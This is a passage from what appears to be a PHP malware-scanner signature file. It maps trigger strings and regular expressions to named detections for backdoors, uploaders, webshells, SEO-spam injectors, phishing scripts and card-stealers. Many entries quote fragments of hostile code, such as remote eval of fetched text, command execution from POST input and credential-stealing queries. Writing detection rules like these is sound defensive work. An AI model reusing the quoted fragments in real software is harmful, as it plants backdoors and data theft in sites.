				'if (!$result && $url && function_exists(\'fopen' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.curl.011', '\$url\s*=\s*\$_[^;]+?;[^!]+?!\$result[^!]+?!\$result && \$url && function_exists\(\'fopen[^;]+?;\s*if\s*\(\s*\$fp[^;]+?;\s*\}\s*@?fclose\s*\(\s*\$fp\s*\)\s*;\s*\}\s*\}\s*echo\s+\$result\s*;'),
				'modules/simpleslideshow/uploadimage.php' => array(STR_CLEARFILE, 'php.backdoor.uploader.099', NULL),
				'function Reletter($letter,$mailto){ $file = file_get_contents($letter);' => array(STR_CLEARFILE, 'html.phishing.apple.018.01', NULL),
				'if (file_exists($cf) and filemtime($cf) > time() - 3600)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.296', '\$[\w]*[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*\$[\w]*[\s]*=[\s]*trim\(\$_SERVER\[.REQUEST_URI.\]\);[^@]+@ini_set\(.allow_url_fopen.,[\s]*1\);[^@]+@ini_set\([^@]+@fsockopen\(\$[\w]*,[\s]*80,[^@]+@fputs\(\$[\w]*[^@]+@fread\(\$[\w]*,[^\}]+@file_put_contents\(\$[\w]*,[\s]*\$[\w]*\);[^@]+@ini_set\(.allow_url_fopen.,[^\}]+default_socket_timeout.,[\s]*\$[\w]*\);[\s]*\}'),	    
				'$wpdb->prefix.\'users set user_login = "wpgateway_sec_admin' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.022', NULL),
				'get_root(); $ws_file = $cache_dir.\'/\'.$ws_hash.\'.zip\'; require($ws_file); die(\'\');' => array(STR_CLEARFILE, 'php.spam-seo.generic.037', NULL),
			),
	
			'echo' => array(STR_TRIGGER,
		
				'"http' => array(STR_TRIGGER,
	
					'file_get_contents("http' => array(STR_TRIGGER,
	
						'(stristr($_SERVER[\'HTTP_USER_AGENT\']' => array(STR_TRIGGER,
							'explode("###",$' => array(STR_CLEARFILE, 'php.spam-seo.injector.318', NULL),
						),
	
						'-c config.json >/dev/null 2>&1 &");echo $result;if ($result){echo' => array(STR_CLEARFILE, 'php.backdoor.uploader.376', NULL),
						'update.php") AND stripos($new_version, $plugin_key)' => array(STR_CLEARFILE, 'php.malware.unwanted-ads.001', NULL),
						'function file_get_contents_helload($' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.015', NULL),
					),
	
					'ini_get("allow_url_fopen")' => array(STR_TRIGGER,
						'"../../wp-load.php");' => array(STR_TRIGGER,
							'"?pc=".$' => array(STR_CLEARFILE, 'php.backdoor.uploader.278', NULL),
						),
					),
	
					'"rpc_server";' => array(STR_TRIGGER,
						'"TEAM_CC";' => array(STR_TRIGGER,
							'function execute_command' => array(STR_CLEARFILE, 'php.backdoor.botshell.004', NULL),
						),
					),
	
					'])&&md5($_POST[$' => array(STR_TRIGGER,
						');}}else{@file_put_contents(' => array(STR_TRIGGER,
							'])&&md5($_POST[$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.064', 'function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*chr\([\d]+\)[^}]+@unlink\(\$[\w]+\);[\s]*\}[\s]*\$[\w]+[^\{]+&&md5\(\$_POST\[\$[\w]+\]\)==\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\@file_put_contents\(\$[\w]+,[^\}]+\);\}\}else\{\@file_put_contents\([^\}]+\);\}\}\}die\(\);\}'),
						),
					),

					'$sourceBody' => array(STR_TRIGGER,
						'function CreateLink($dir' => array(STR_CLEARFILE, 'php.spam-seo.injector.287', NULL),
					),
	
					'function os_info(' => array(STR_TRIGGER,
						'function bankDetails($cardNumber)' => array(STR_CLEARFILE, 'php.phishing.script.020', NULL),
					),
	
					'file_put_contents($Name, $' => array(STR_TRIGGER,
						'$url = "http://" . $_SERVER[\'HTTP_HOST\']' => array(STR_CLEARFILE, 'php.backdoor.uploader.329', NULL),
					),
	
					'if (!empty($_FILES) && is_uploaded_file' => array(STR_TRIGGER,
						'($_FILES[$fname][$tname], $_FILES[$fname][$name]);' => array(STR_CLEARFILE, 'php.backdoor.uploader.327', NULL),
					),
	
					'<a title="Delete" href="?p=<?php echo urlencode(' => array(STR_TRIGGER,
						'<a title="Open direct link" href="<?php echo' => array(STR_CLEARFILE, 'php.backdoor.webshell.202', NULL),
					),
	
					'if (strpos($mxhosts[0], "google.com' => array(STR_TRIGGER,
						'file_get_contents($file_path);' => array(STR_CLEARFILE, 'php.phishing.script.025', NULL),
					),
	
					'str_replace(array($' => array(STR_TRIGGER,
						'array($dir, \'http' => array(STR_CLEARFILE, 'php.spam-seo.brands.003', NULL),
					),
	
					'if($_POST["spread"] == "true") {' => array(STR_TRIGGER,
						'$file_url = $domain . str_replace($homedir, "", $newfile);' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.017', NULL),
					),
	
					'Accept-Language: zh-cn' => array(STR_TRIGGER,
						'eval (http_get' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.002', NULL),
					),
	
					'$check = array("/wso.php","/up.php' => array(STR_CLEARFILE, 'php.backdoor.shellfinder.004', NULL),
					'if(preg_match("/$truecref/i",$crefs)){return' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.297', 'error_reporting\(0\);[\s]*if\(preg_match\([^\}]+\$stop_ip_mask\}[^\|]+stripos\(\$ip,[^\}]+\}[\s]*else[^<]+echo <[^;]+ESOT;[^\*]+\*\?href=\)[^\}]+\}[\s]*if[^\}]+\}[\s]*echo \$[\w]+;[\s]*exit[^;]*;[\s\}]+[\s]*(define\(.DISALLOW_FILE_MODS[^;]+\);)?'),
					'echo ($subdir)? url()."/".$subdir."/editor/save.php"' => array(STR_CLEARFILE, 'php.backdoor.uploader.304', NULL),
					'header\(.Content-type[^;]+;[\s]*\$[\w]+[\s]*=[\s]*isset\(\$_GET\[.[\w]+.\]\)\?\$_GET\[.[\w]+.\]:[^\}]+\}[\s]*else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*isset\(\$_GET\[[^@]+@[\s]*\$data[\s]*=[\s]*file_get_contents\(\$[\w]+\);[^\}]+exit\(\);[\s]*\}' => array(REX_CLEARFILE, 'php.backdoor.file_get_contents.040', NULL),
					'post_stats(\'cr\',\'OK\',$tg,$injected,$nfo);' => array(STR_CLEARFILE, 'php.malware.db_injector.009', NULL),
					'sprintf("<span class=\'%s\' >%s</span>", count($firewall) < 1 ? "ok" : "error", count' => array(STR_CLEARFILE, 'php.backdoor.webshell.206', NULL),
					'$linka = $link."&".$_SERVER[\'QUERY_STRING\']."&xfsr=true";' => array(STR_CLEARFILE, 'php.malware.redirect.027', NULL),
					'define(\'MY_BASE_URL\', $ShellUri);' => array(STR_CLEARFILE, 'php.backdoor.uploader.398', NULL),
					'((strpos($get_content, \'confirm:start of editor file\') !== false) && (strpos($get_content' => array(STR_CLEARFILE, 'php.backdoor.uploader.415', NULL),
					'$page = new Page($template, $text, $keyword, Blog::gen_links(Blog::$min_page_links' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.116', NULL),
					'if(isset($_POST[\'adm_sniff\']) && isset($_POST[\'pasw\'])' => array(STR_CLEARFILE, 'php.backdoor.injector.137', NULL),
					'str_replace("{manytext_bing}",$' => array(STR_CLEARFILE, 'php.spam-seo.injector.285.02', NULL),
					'"POST {$url[\'path\']}?bot_ip=" . urlencode($_SERVER[\'REMOTE_ADDR\']) . " HTTP/1.1\r\n";' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.119', NULL),
				),
	
				'header(\'Content-Type:' => array(STR_TRIGGER,
	
					'case \'g\': $this->get_properties();' => array(STR_TRIGGER,
						'case \'i\': phpinfo();' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.015', NULL),
					),
	
					'function outScript' => array(STR_TRIGGER,
						'sync_htaccess($htaccess_rule' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.042', NULL),
					),
	
					'X-Forwarded-For' => array(STR_TRIGGER,
						'file_get_contents(\'http' => array(STR_CLEARFILE, 'php.backdoor.uploader.328', NULL),
					),
	
					'/shadow' => array(STR_TRIGGER,
						'$ports = array(25, 587, 465, 110, 995, 143, 993);' => array(STR_CLEARFILE, 'php.hacktool.cpanel_user_shadow_editor.003', NULL),
					),
	
					'oogle\')!== false||strpos($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.016', 'header\(.Content-Type:text.html;charset=\w+.\);\s*(\$\w+)\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\];\s*if\(strpos\(\1,.[gole]{4,}.\)\!\s*==\s*false\|\|strpos\(\1,.[baidu]{4,}.\)\s*\!==\s*false\)\s*{\s*(\$\w+)\s*=\s*file_get_contents\(.[htps]{4,}:[^;]+;\s*echo\s*\2;\s*\}'),
					'{case  "home":home();break;case  "up":up();break;case  "upload":if(!isset($_FILES[\'upfile\'])){printerror(\'' => array(STR_CLEARFILE, 'php.backdoor.chinese_shell.001', NULL),
					'$get_url = $api."?bot=id&shkey=".$shkey."&act=1"."&id=".$id."&suffix=". $suffix ."&md5=".$url_md5' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.071', NULL),
					'@mysqli_fetch_array(mysqli_query($conn,\'select count(*) as num from \'.$table_prefix.\'posts where post_status ="publish"' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.085', NULL),
					'echo "<html><head><meta http-equiv=\'refresh\' content=\'0; url=$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.090', NULL),
					'$file=explode(\':\',base64_decode($_POST[\'return\']));' => array(STR_CLEARFILE, 'php.backdoor.uploader.298', NULL),
					'if(strpos($key,\'baidu\')!==false' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.047', 'header\(.Content-Type:text[^\{]+strpos\(\$[\w]+,.[\w]+.\)!==false\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\([^;]+.\);[\s]*echo[\s]*\$[\w]+;.?.?[\s]*\}'),
				),
	
				'$url)' => array(STR_TRIGGER,

                    'array(\'google\', \'yandex\', \'bing\', \'GeccoBot\');' => array(STR_TRIGGER,
                        'strpos_array($_SERVER[\'HTTP_USER_AGENT\'],' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.118', NULL),
                    ),

					'exec("pkill' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.044', NULL),
					'isset($landing_url_parts[\'query\'])' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.083.02', NULL),
					'$querystring; ob_clean(); $filedata =theUrlContent($furl); echo $filedata; exit;' =>array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.015', NULL),
				),
	
				'function dirToArray($dir)' => array(STR_TRIGGER,
					'echo get_option("siteurl");' => array(STR_TRIGGER,
						'if($_POST[\'action\']==\'unlink\')' => array(STR_CLEARFILE, 'php.backdoor.uploader.278.02', NULL),
						'if($_REQUEST[\'action\']==\'unlink\')' => array(STR_CLEARFILE, 'php.backdoor.uploader.278.03', NULL),
					),
				),
	
				'base64_decode($_REQUEST[' => array(STR_TRIGGER,
	
					'function post_self(' => array(STR_TRIGGER,
						'$params = "from=$from&mailto=$mailto&subject=$subject&msg=$msg&self' => array(STR_CLEARFILE, 'php.phishing.mailer.102', NULL),
					),
	
					'echo \'<pre>\'.file_get_contents($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.031', '(\$\w+)\s*=\s*[\'"][^;]+;\s*if\(isset\(\$_REQUEST\[.\w+.\]\)\)\s*{\s*(\$\w+)\s*=\s*base64_decode\(\$_REQUEST\[.\w+.\]\)\s*;\s*echo\s*\'<\w+>\'\.file_get_contents\(\2\);'),
				),
	
				'hack' => array(STR_TRIGGER,
	
					'index.php?option=com_' => array(STR_TRIGGER,
						'ot infected' => array(STR_CLEARFILE, 'php.backdoor.uploader.100', NULL),
					),
	
					'>Deface Page Checker' => array(STR_CLEARFILE, 'php.hacktool.deface_checker.001', NULL),
				),
	
				'@system("chmod 777 "' => array(STR_TRIGGER,
					'\'find / -type f -name "' => array(STR_TRIGGER,
						'"#already exist#:"' => array(STR_CLEARFILE, 'php.spam-seo.injector.274', NULL),
					),
				),
	
				'function getAgent()' => array(STR_TRIGGER,
					'function get_url_content($url)' => array(STR_TRIGGER,
						'echo $htmlcontent;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.282', 'function getAgent\(\)[\s]*\{[\s]*\$user_agent[^}]+\}[\s]*return false;[\s]*\}[\s]*function[\s]*getReferrer\(\)[\s]*\{[\s]*\$page_from[^&]+if[\s]*\(getAgent\(\)[\s]*&&[\s]*\$_SERVER\[.REQUEST_URI.\][\s]*==[^\{]+\{[\s]*\$htmlcontent[\s]*=[\s]*get_url_content[^}]+\}'),
					),
				),
	
				'($_POST[\'e\']));' => array(STR_TRIGGER,
					'=\'.png\'){$' => array(STR_TRIGGER,
						'->getPath();}}catch(Exception$' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.131', NULL),
					),
				),
	
				'array(\'status\'=>\'GOOD\',' => array(STR_TRIGGER,
					'$info[\'http_code\']' => array(STR_TRIGGER,
						'curl_multi_add_handle($' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.005', NULL),
					),
				),
	
				'=base64_encode(file_get_contents(' => array(STR_TRIGGER,
					';unlink($_SERVER[\'SCRIPT_FILENAME\']);?>' => array(STR_CLEARFILE, 'php.backdoor.generic.073', NULL),
				),
		
				'if (strpos($userAgent,\'Windows' => array(STR_TRIGGER,
					'f($params[\'ss\'] == \'tt\')' => array(STR_CLEARFILE, 'php.backdoor.uploader.125', NULL),
				),
		
				'if($_GET[\'id\']==' => array(STR_TRIGGER,
					'=(htmlspecialchars(file_get_contents(' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.056', NULL),
				),
	
				'file_put_contents($path,file_get_contents(' => array(STR_TRIGGER,
					'unlink ($path)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.018', '(?:ignore_user_abort\s*\(true\)\s*;\s*set_time_limit\(\d+\)\s*;\s*while\(\d+\)\s*{\s*)?\$\w+\s*=[^;]+\s*;\s*if\s*\(is_writable\((\$\w+)\)\s*==\s*false\s*\)\s*{\s*unlink\s*\(\1\)\s*;\s*echo[^;]+;\s*chmod\s*\(\1\s*,\s*[0-7]{0,4}\s*\)\s*;\s*}\s*file_put_contents\(\1\s*,file_get_contents\([^\)]+\)\)\s*;\s*if\s*\(file_exists\s*\(\1\)\)\s*{\s*echo[^}]+}\s*else\s*{\s*echo[^}]+}(?:\s*sleep\(\d+\)\s*;)?'),
				),
	
				'preg_replace(\'/(htdocs|httpdocs|www)(.*)/\',\'$1\',dirname($_SERVER["SCRIPT_FILENAME"]' => array(STR_TRIGGER,
					'$addOk = true' => array(STR_CLEARFILE, 'php.hacktool.cms_credentials_stealer.010', NULL),
				),
	
				'return (bool)strpos($haystack, $needle);' => array(STR_TRIGGER,
					'$content = file_get_contents' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.263', 'function [\w]+\(\$haystack,[\s]*\$needle\)[\s]*\{[\s]*\$haystack[^;]+;[\s]*return \(bool\)strpos\(\$haystack, \$needle\);[\s]*\}[\s]*\$s_agent[\s]*=[^}]+echo \$content;[\s]*\}'),
				),
	
				'str_replace("</span>", "", $' => array(STR_TRIGGER,
					'echo "<p>".implode($' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.089', NULL),
				),
	
				'saveOneShell($shell_base_dir,$type)' => array(STR_TRIGGER,
					'function processHtaccess($base_dir)' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.155', '<\?php[\s]*\$\{"[^\}]+\\\\x[^\}]+\}\[[^\n]+\}[\s]*\?>'),
				),
	
				'function add_backlink_to_post($' => array(STR_TRIGGER,
					'print"#Unable to create new post#' => array(STR_CLEARFILE, 'php.spam-seo.injector.276', NULL),
				),
				
				'"YES!!!";' => array(STR_TRIGGER,
					'unlink(' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.090', 'NULL'),
				),
	
				'define(\'_NET\',$NET);' => array(STR_TRIGGER,
					'function get_cont($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.293.02', 'if\(!defined\(._NET.\)\)[\s]*{[\s]*error_reporting\(0\);[^!]+if\(!empty\(\$_SERVER\[.HTTP_USER_AGENT.\]\)\)[\s]*{\$[^@]+@file_get_contents\(\$[\w]+\);return[^\n]+[\s]*\}[\s]*(\/\*,.\*\/)?'),
				),
				
				'_gate_path); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT' => array(STR_TRIGGER,
					'file_get_contents("php://input")); curl_setopt($curl, CURLOPT_REFERER, $_SERVER[\'REMOTE_ADDR\']' => array(STR_CLEARFILE, 'php.hacktool.doorway-gen.002', NULL),
				),
	
				'iconv(' => array(STR_TRIGGER,
					'file_get_contents\(\$[\w]+\([^;]+\)\);[\s]*\$[\w]+[\s]*=[\s]*iconv\(' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.057', '\$[\w]+[\s]*=[\s]*.[\w]+[^;]+;[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\(\$[\w]+\([^;]+\)\);[\s]*\$[\w]+[\s]*=[\s]*iconv\([^;]+\);[\s]*echo[\s]*\$[\w]+;'),
				),

				'(chref($htprefs)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.212', 'error_reporting\(0\);[^>]+function getHtml\(\$[^\*]+[^\}]+[^@]+echo \$con[^;]*;[\s]*exit[^;]*;[\s]*\}[\s]*(setcookie\([^;]+\);[\s]*)?'),
				'echo \'createa failed!\';' => array(STR_CLEARFILE, 'php.malware.generic.067', NULL),
				'preg_replace("(<a href=\"[^>]*\?)","<a href=\"?",$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.007', 'set_time_limit\(\d\)\s*;\s*header\([\'"][Cc]ontent\-[Tt]ype:\s*text.html\s*;\s*charset\s*=\s*gb2312[\'"]\);\s*date_default_timezone_set\(.PRC.\)\s*.\$\w+[^;]+;\s*\$\w+\s*=\s*[\'"]http[^;]+;\$[^{]+{\$\w+\s*=\s*file_get_contents\(\$[^\)]+\)\s*;\s*}\s*else\{\$\w+\s*=\s*file_get_contents\(\$[^\)]+\);\s*}\s*\$\w+\s*=\s*.http(s)?:[^;]+;\s*\$\w+\s*=\s*file_get_contents\(\$\w+\.[\'"]\s*.index\.php\?host=[\'"]\.\$host_name[^;]+;\s*\$\w+\s*=\s*preg_replace\(file_get_contents\(\$[^\)]+\),\s*file_get_contents\(\$[^\)]+\),\$\w+\s*\);[^;]+;\s*\$\w+\s*\=\s*preg_replace\(.\(\<a\s*href\=[^,]+,.<a\s*href=[^;]+;\s*echo\s*\$d'),
				'array_push($good, $site.\':\'.macroses($site, $login).\':\'.macroses($site, $passwords[$rst]));' => array(STR_CLEARFILE, 'php.malware.file_exists.003', NULL),
				')){echo(file_get_contents' => array(STR_CLEAR_LINEMATCH, 'php.malware.file_exists.001', 'if\(file_exists\([\'"][^\.]+\.(png|gif|jpeg|jpg|bmp)[\'"]\)\)\s*{echo\(file_get_contents\([\'"][^\.]+.(png|gif|jpeg|jpg|bmp)[\'"]\)\);}'),
				'eval\s*\(\s*file_get_contents\(.http:\/\/\S+\.txt.\)\s*\)\s*;' => array(REX_CLEAR_LINEMATCH, 'rex.fgc_txt.001', 'eval\s*\(\s*file_get_contents\(.http:\/\/\S+\.txt.\)\s*\)\s*;'),
				'OnepageController.php",base64_decode($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.079', '(\$\w+)\s*=\s*file_get_contents\([^\)]+\);\s*(\$\w+)\s*=\s*file_get_contents\([^\)]+\)\s*;\s*if\s*\(\s*strpos\s*\(\2,\s*.file_put_content.\)\s*[^\)]+\)\s*{\s*echo[^{]+{\s*file_put_contents\(.[(\.\w+\/)]+OnepageController\.php.\s*,\s*base64_decode\(\s*\1\s*\)\s*\)\s*;\s*echo[^;]+;\s*}'),
				'file_put_contents(sprintf(\'%s/wp-loader.php\', $file->getPath()), $' => array(STR_CLEARFILE, 'php.spam-seo.injector.266', NULL),
				'"TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src=' => array(STR_CLEARFILE, 'php.malware.db_injector.005', NULL),
				'@file_put_contents($sub_path."/xmlrpc.php",base64_decode(strtr' => array(STR_CLEARFILE, 'php.backdoor.injector.125', NULL),
				'@search_file($_SERVER[\'DOCUMENT_ROOT\'].$dop,$file_to_search);' => array(STR_CLEARFILE, 'php.malware.injector.060', NULL),
				'foreach ($GLOBALS["writable_dirs"] as $wdir)' => array(STR_CLEARFILE, 'php.backdoor.uploader.266', NULL),
				']($xml_link);$google=@$GLOBALS{' => array(STR_CLEARFILE, 'php.spam-seo.injector.280', NULL),
				'echo "Go COPY from ".$url." to ".$_GET[\'n\'].".zip";' => array(STR_CLEARFILE, 'php.backdoor.uploader.275', NULL),
				'$admin_list[] = $r[\'user_login\'].\' / \'.$r[\'user_pass\'];' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.021', NULL),
				'function user_min_browser($agent' => array(STR_CLEARFILE, 'php.spam-seo.redirect.111', NULL),
				'\$file[\s]*=[\s]*file_get_contents\(.http[^\)]+\.txt.\);[\s]*echo[\s]*\$file;' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.308', '\$file[\s]*=[\s]*file_get_contents\(.http[^\)]+\.txt.\);[\s]*echo[\s]*\$file;'),
				'echo \'document.location.href=unescape("\'.rawurlencode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.021', '\$[\w]+[\s]*=[\s]*file_get_contents\(.http[^$]+header\(.Location:[\s]*.\.\$[\w]+\);[^>]+htmlspecialchars\(\$[\w]+\)[^\(]+document.location.href=unescape\(..\.rawurlencode\([^<]+echo[\s]*.<.script>.;[^>]+htmlspecialchars\(\$[\w]+\)[^<]+echo[\s]*.([\w]*[\s]*)*<.a>.;'),
				'$sql = "SELECT user_email FROM ".$mysqli->real_escape_string($table_prefix)."users";' => array(STR_CLEARFILE, 'php.hacktool.mailstealer.003', NULL),
				'test\'){echo \'ok\';exit;}' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.371', 'if\(isset\(\$_GET\[.[\w]+[^\{]+test.\)\{echo .ok.;exit;[\s]*\}[\s]*if\(isset\(\$_GET[^\}]+\}[\s]*@?file_put_contents[^\}]+\}'),
				'if(preg_match(\'/200/\',$file_path_ht' => array(STR_CLEARFILE, 'php.backdoor.generic.088', NULL),
				'if(preg_match(\'#([ ]{200,}if\\(file_exists\\(\\\'.+?\\\'\\)\\) require_once\\(\\\'.+?\\\'\\);)#si\',$' => array(STR_CLEARFILE, 'php.backdoor.webshell.224', 'NULL'),
				'echo @file_get_contents(\'index.html.bak' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.084', 'echo @file_get_contents\(.index.html.bak[^;]*\);'),
				'function scandirsgml($dir,$arr)' => array(STR_CLEARFILE, 'php.backdoor.uploader.416', NULL),
			),
	
			'file_put_contents($' => array(STR_TRIGGER,
	
				'strpos(' => array(STR_TRIGGER,
	
					'array();goto' => array(STR_TRIGGER,
						':echo json_encode($' => array(STR_CLEARFILE, 'php.backdoor.webshell.215', NULL),
					),
	
					'\$[\w]+[\s]*=[\s]*strpos\(\$[\w]+[\s]*,[\s]*\$[\w]+\);[\s]*if[\s]*\(\$[\w]+[\s]*===[\s]*false\)[\s]*\{[\s]*unlink\(.[\S]+.\);[\s]*\$[\w]+[\s]*=[\s]*file_get_contents' => array(REX_CLEARFILE, 'php.malware.injector.066', NULL),
					'echo ":::NO REPLY CHK:::$file_path:::\r\n";' => array(STR_CLEARFILE, 'php.malware.dropper.036', NULL),
					'search_file_js($_SERVER[\'DOCUMENT_ROOT\']."/../../../..' => array(STR_CLEARFILE, 'php.malware.infector.004', NULL),
					'PD9waHAKJE1oID0gJ2VzY' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.COOKIE_eval.009', 'if[\s]*\([\s]*isset\([\s]*\$_GET\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*if[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*get_template_directory\(\)[\s]*.[\s]*.[^(]+if[\s]*\(file_put_contents\(\$[\w]+,[\s]*base64_decode\(.PD9[^\{]+\{[\s]*echo[^!]+!==[\s]*FALSE\)[\s]*wp_delete_user\(\$[\w]+->ID\);[\s]*}[^\}]+die\(\);[\s]*\}'),
				),
	
				'stream_get_contents($' => array(STR_TRIGGER,
	
					'md5(rand(0' => array(STR_TRIGGER,
						'add_action(\'init' => array(STR_CLEARFILE, 'php.backdoor.curl.018', NULL),
					),
	
					'&zero_act=upload' => array(STR_TRIGGER,
						'(zeroCommand(\'wget' => array(STR_CLEARFILE, 'php.backdoor.webshell.207', NULL),
					),
	
					'curl_exec($' => array(STR_TRIGGER,
						'$dump = \'<?php' => array(STR_CLEARFILE, 'php.backdoor.uploader.382', NULL),
					),
	
					'@posix_getuid() : null; return json_encode(array(' => array(STR_TRIGGER,
						'return (($this->_=md5($header).substr(md5(strrev($' => array(STR_CLEARFILE, 'php.backdoor.webshell.230', NULL),
					),
				),
	
				'!file_exists($' => array(STR_TRIGGER,
				
					'ignore_user_abort(true);' => array(STR_TRIGGER,
						'|| !file_exists($' => array(STR_CLEARFILE, 'php.malware.injector.072', NULL),
					),
	
					'exec($code,$array);' => array(STR_TRIGGER,
						'php_sapi_name())' => array(STR_CLEARFILE, 'php.backdoor.uploader.413', NULL),
					),
					
					'$_SERVER[\'REQUEST_SCHEME\'] != \'\' ? $_SERVER[\'REQUEST_SCHEME\'] : \'http\') . \'://\' . $' => array(STR_CLEARFILE, 'php.backdoor.uploader.411', NULL),
					'$_COOKIE\') == false) {' => array(STR_CLEARFILE, 'php.malware.injector.088', NULL),
				),
	
				'if(isset($_GET[' => array(STR_TRIGGER,
					'if(function_exists("file_get_contents' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.047', 'if[\s]*\(isset[\s]*\(\$_GET\[.[\w]+.\][\s]*\)[\s]*&&[\s]*\$_GET\[.[\w]+.\][\s]*==[\s]*.[\w]+.\)[\s]*\{[\s]*echo[\s]*.[\w]+.[\s]*;exit;[\s]*\}[\s]*if[\s]*\([\s]*isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*error_reporting[^@]+@file_put_contents\(\$[\w]+,\$[\w]+\);[\s]*echo[\s]*.[\w]+.;[\s]*exit;[\s]*\}'),
					'pack("H*", \'' => array(STR_CLEARFILE, 'php.malware.injector.081', NULL),
					'--;endif;else:continue;endif;endforeach;exit;elseif(isset($_GET[' => array(STR_CLEARFILE, 'php.backdoor.generic.097', NULL),
				),
	
				'CURL' => array(STR_TRIGGER,
					'; if(file_exists($dir)){echo' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.030', NULL),
					'return url_get_contents("$URL_GET?filename=$filename&host=$host");' => array(STR_CLEARFILE, 'php.malware.cryptominer.010', NULL),
				),
	
				'if(strcmp(md5(' => array(STR_TRIGGER,
					'elseif(@file_put_contents($' => array(STR_TRIGGER,
						'$output=$res(substr($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.055', 'if\(isset\(\$_REQUEST\[[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*array[^;]+\);[\s]*if\(strcmp\(md5\([^\)]+\.[\s]*\$_REQUEST[^@]+if[\s]*\([\s]*@copy[\s]*\(__FILE__,[^@]+@file_put_contents[^;]+;[\s]*else echo[^;]+;[\s]*(\/\/[\w]+[\s]*)?'),
					),
				),
	
				'$mail->addAttachment($uploadfile,$_FILES' => array(STR_TRIGGER,
					'escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));' => array(STR_CLEARFILE, 'php.mailer.POST.045', NULL),
				),
	
				'(md5($_SERVER["HTTP_USER_AGENT"]) == base64_decode(' => array(STR_TRIGGER,
					'if (is_uploaded_file($' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.031', NULL),
				),
	
				'=$_SERVER[base64_decode(\'U0VSVkVSX05BTUU=\')];if($_SERVER' => array(STR_TRIGGER,
					'dirname(__FILE__)),array(\'\')));if(count(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.filesman.034', 'if\(\(isset\(\$_GET\[base64_decode\([^;]+\);\$[\w]*.=\$_SERVER\[base64_decode\([^&]+\)&&\$_SERVER\[base64_decode\([^\}]+;\}function[\s]*[\w]+\(\$[^\_]+=array_filter\(glob\(\$[\w]*.base64_decode\([^>]+\$[\w]*=>\$[\w]*\)\$[^@]+\);\}\}\@ini_set\(base64_decode\(.ZGlzcGxheV9lcnJvcnM=.\),base64_decode\([^\}]+\);\}\}\}\}\}if\(true\)\{\$[\w]+=dirname\(__FILE__\);if\(\$[^\}]+\);\}\}foreach\(\$[^\}]+\);\}\}\}echo[\s]*base64_decode\([^\}]+base64_decode\(.[\w]*[+]*.\);\}'),
				),
	
				'@set_time_limit(0);error_reporting(0);' => array(STR_TRIGGER,
					'PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQpSZXdyaXRlRW5naW5' => array(STR_CLEARFILE, 'php.malware.injector.068', NULL),
				),
	
				'$suffixes[floor($base)];}function max_file_upload_in_bytes()' => array(STR_TRIGGER,
					'exec($_POST[' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.050', NULL),
				),
	
				'(chmod(zeroPath()' => array(STR_TRIGGER,
					'zero_act=upload' => array(STR_CLEARFILE, 'php.backdoor.webshell.223', NULL),
				),
	
